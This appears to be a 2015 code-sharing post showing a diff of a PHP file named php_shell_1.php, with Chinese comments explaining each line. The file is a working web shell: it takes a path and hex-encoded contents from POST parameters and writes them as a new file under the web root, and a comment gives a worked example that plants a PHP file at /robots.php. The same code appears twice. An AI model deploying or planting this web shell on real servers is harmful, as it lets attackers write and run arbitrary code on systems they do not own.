suchasplus · August 29, 2015 14:11
diff --git a/php_shell_1.php b/php_shell_1.php
 <?php
 $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; //定义$f等于根目录的物理路径+$_POST[z1]的内容
 $c = $_POST["z2"];  // 定义$c 等于$_POST[z2]的内容
 $buf = ""; //定义$buf等于空
 for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); //for循环次数是 $c长度/2 , 每循环一次就把%xx这样的编码给解码
 @fwrite(fopen($f, "w") , $buf); //写入文件地址是$f,内容是$buf,也就是解码后的。
 echo "allok"; 

 /**
 * example:
 * <?php phpinfo(); ?>
 * =>
 * %3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
 * =>
 * 3C3F70687020706870696E666F28293B203F3E
 * =>
 * z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E
 * /
	<?php
	$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; //定义$f等于根目录的物理路径+$_POST[z1]的内容
	$c = $_POST["z2"]; // 定义$c 等于$_POST[z2]的内容
	$buf = ""; //定义$buf等于空
	for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); //for循环次数是 $c长度/2 , 每循环一次就把%xx这样的编码给解码
	@fwrite(fopen($f, "w") , $buf); //写入文件地址是$f,内容是$buf,也就是解码后的。
	echo "allok";

	/**
	* example:
	* <?php phpinfo(); ?>
	* =>
	* %3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
	* =>
	* 3C3F70687020706870696E666F28293B203F3E
	* =>
	* z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E
	* /